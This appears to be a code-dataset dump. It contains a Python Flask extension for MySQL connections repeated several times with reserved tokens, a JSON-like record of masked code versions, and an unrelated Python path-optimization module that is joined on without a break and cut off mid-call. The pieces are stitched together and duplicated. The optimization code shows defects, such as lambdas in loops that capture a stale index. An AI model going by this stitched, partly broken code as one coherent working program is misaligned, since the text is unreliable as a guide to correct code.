if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
@property
def connection(self):
"""Attempts to connect to the MySQL server.
:return: Bound MySQL connection object if successful or ``None`` if
unsuccessful.
"""
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'mysql_db'):
ctx.mysql_db = self.connect
return ctx.mysql_db
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
<|reserved_special_token_1|>
import MySQLdb
import MySQLdb.cursors
from flask import _app_ctx_stack, current_app
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Initialize the `app` for use with this
:class:`~flask_mysqldb.MySQL` class.
This is called automatically if `app` is passed to
:meth:`~MySQL.__init__`.
:param flask.Flask app: the application to configure for use with
this :class:`~flask_mysqldb.MySQL` class.
"""
app.config.setdefault('MYSQL_HOST', 'localhost')
app.config.setdefault('MYSQL_USER', None)
app.config.setdefault('MYSQL_PASSWORD', None)
app.config.setdefault('MYSQL_DB', None)
app.config.setdefault('MYSQL_PORT', 3306)
app.config.setdefault('MYSQL_UNIX_SOCKET', None)
app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)
app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)
app.config.setdefault('MYSQL_USE_UNICODE', True)
app.config.setdefault('MYSQL_CHARSET', 'utf8')
app.config.setdefault('MYSQL_SQL_MODE', None)
app.config.setdefault('MYSQL_CURSORCLASS', None)
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = current_app.config[
'MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = current_app.config[
'MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
@property
def connection(self):
"""Attempts to connect to the MySQL server.
:return: Bound MySQL connection object if successful or ``None`` if
unsuccessful.
"""
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'mysql_db'):
ctx.mysql_db = self.connect
return ctx.mysql_db
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
<|reserved_special_token_1|>
import MySQLdb
import MySQLdb.cursors
from flask import _app_ctx_stack, current_app
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Initialize the `app` for use with this
:class:`~flask_mysqldb.MySQL` class.
This is called automatically if `app` is passed to
:meth:`~MySQL.__init__`.
:param flask.Flask app: the application to configure for use with
this :class:`~flask_mysqldb.MySQL` class.
"""
app.config.setdefault('MYSQL_HOST', 'localhost')
app.config.setdefault('MYSQL_USER', None)
app.config.setdefault('MYSQL_PASSWORD', None)
app.config.setdefault('MYSQL_DB', None)
app.config.setdefault('MYSQL_PORT', 3306)
app.config.setdefault('MYSQL_UNIX_SOCKET', None)
app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)
app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)
app.config.setdefault('MYSQL_USE_UNICODE', True)
app.config.setdefault('MYSQL_CHARSET', 'utf8')
app.config.setdefault('MYSQL_SQL_MODE', None)
app.config.setdefault('MYSQL_CURSORCLASS', None)
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = \
current_app.config['MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = \
current_app.config['MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
@property
def connection(self):
"""Attempts to connect to the MySQL server.
:return: Bound MySQL connection object if successful or ``None`` if
unsuccessful.
"""
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'mysql_db'):
ctx.mysql_db = self.connect
return ctx.mysql_db
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
|
flexible
|
{
"blob_id": "db8c2f6f5da0b52c268634043e1132984f610eed",
"index": 8405,
"step-1": "<mask token>\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n <mask token>\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n <mask token>\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-2": "<mask token>\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n <mask token>\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-3": "<mask token>\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n\n @property\n def connection(self):\n \"\"\"Attempts to connect to the MySQL server.\n\n :return: Bound MySQL connection object if successful or ``None`` if\n unsuccessful.\n \"\"\"\n ctx = _app_ctx_stack.top\n if ctx is not None:\n if not hasattr(ctx, 'mysql_db'):\n ctx.mysql_db = self.connect\n return ctx.mysql_db\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-4": "import MySQLdb\nimport MySQLdb.cursors\nfrom flask import _app_ctx_stack, current_app\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n\n @property\n def connection(self):\n \"\"\"Attempts to connect to the MySQL server.\n\n :return: Bound MySQL connection object if successful or ``None`` if\n unsuccessful.\n \"\"\"\n ctx = _app_ctx_stack.top\n if ctx is not None:\n if not hasattr(ctx, 'mysql_db'):\n ctx.mysql_db = self.connect\n return ctx.mysql_db\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-5": "import MySQLdb\nimport MySQLdb.cursors\nfrom flask import _app_ctx_stack, current_app\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = \\\n current_app.config['MYSQL_CONNECT_TIMEOUT']\n\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = \\\n current_app.config['MYSQL_READ_DEFAULT_FILE']\n\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.config['MYSQL_CURSORCLASS'])\n\n return MySQLdb.connect(**kwargs)\n\n @property\n def connection(self):\n \"\"\"Attempts to connect to the MySQL server.\n\n :return: Bound MySQL connection object if successful or ``None`` if\n unsuccessful.\n \"\"\"\n\n ctx = _app_ctx_stack.top\n if ctx is not None:\n if not hasattr(ctx, 'mysql_db'):\n ctx.mysql_db = self.connect\n return ctx.mysql_db\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Bounds(object):
"""Required for acceptance testing in scipy.optimize.basinhopping"""
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs['x_new']
return self.is_valid(x)
def SLSQP_constraints(self):
"""Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i"""
funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.
costs[1:])]
funs.append(lambda x: x[0] + self.costs[0])
funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]
funs += [lambda x: -x[i]]
n = len(self.costs)
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
}, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
"""Return bounds as sequence"""
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
<|reserved_special_token_0|>
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
method='SLSQP'):
"""
Perform the mixed ILP optimization (without queues, or memory), that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
"""
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds
(), 'constraints': bounds.SLSQP_constraints()[method.lower()]}
result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=
step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,
interval=20, minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda
x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.
integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim
.linear_relief, deadtime_penalty=4):
"""Generates the components necessary to completely specify
best-path optimization routine. (With a queue model)
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
"""
B = np.vstack(BTable[bid] for bid in path)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
"""Simulate the queue effects, and then evaluate the objective function
on the simulation result"""
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=
BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes
) ** 2 - avg_rates.sum() * Acc.sum()
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
<|reserved_special_token_0|>
def parse_behaviours(behaviours, dtype=np.float32):
"""[(bid, [bvec])] -> {bid: <bvec>}"""
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
"""[[float]] -> np.array(...) of same shape"""
return np.array(F)
<|reserved_special_token_0|>
def range_sum(cum_F, a, b, penalty=-1000):
"""Penalty brutally dominates any out-of-index operation..."""
z = cum_F.shape[-1] - 1
if not 0 <= a <= z or not 0 <= b <= z:
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
<|reserved_special_token_0|>
def barrier(times, path, BTG):
"""Handles Linear/causality Constraints with respect to transitions"""
t = [0] + list(times)
S = 0.0
for i in xrange(len(path) - 1):
edge = path[i], path[i + 1]
tau = BTG[edge]
S += min(0, t[i + 1] - t[i] - tau)
return S
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Bounds(object):
"""Required for acceptance testing in scipy.optimize.basinhopping"""
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs['x_new']
return self.is_valid(x)
def SLSQP_constraints(self):
"""Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i"""
funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.
costs[1:])]
funs.append(lambda x: x[0] + self.costs[0])
funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]
funs += [lambda x: -x[i]]
n = len(self.costs)
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
}, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
"""Return bounds as sequence"""
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
"""Erlang Entry Point to Optimization Module"""
B_table = parse_behaviours(behaviours)
BTG = parse_edgelist(btg)
F = parse_prediction(prediction)
path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)
return list(path), map(lambda x: int(x) + start, t.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
method='SLSQP'):
"""
Perform the mixed ILP optimization (without queues, or memory), that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
"""
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds
(), 'constraints': bounds.SLSQP_constraints()[method.lower()]}
result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=
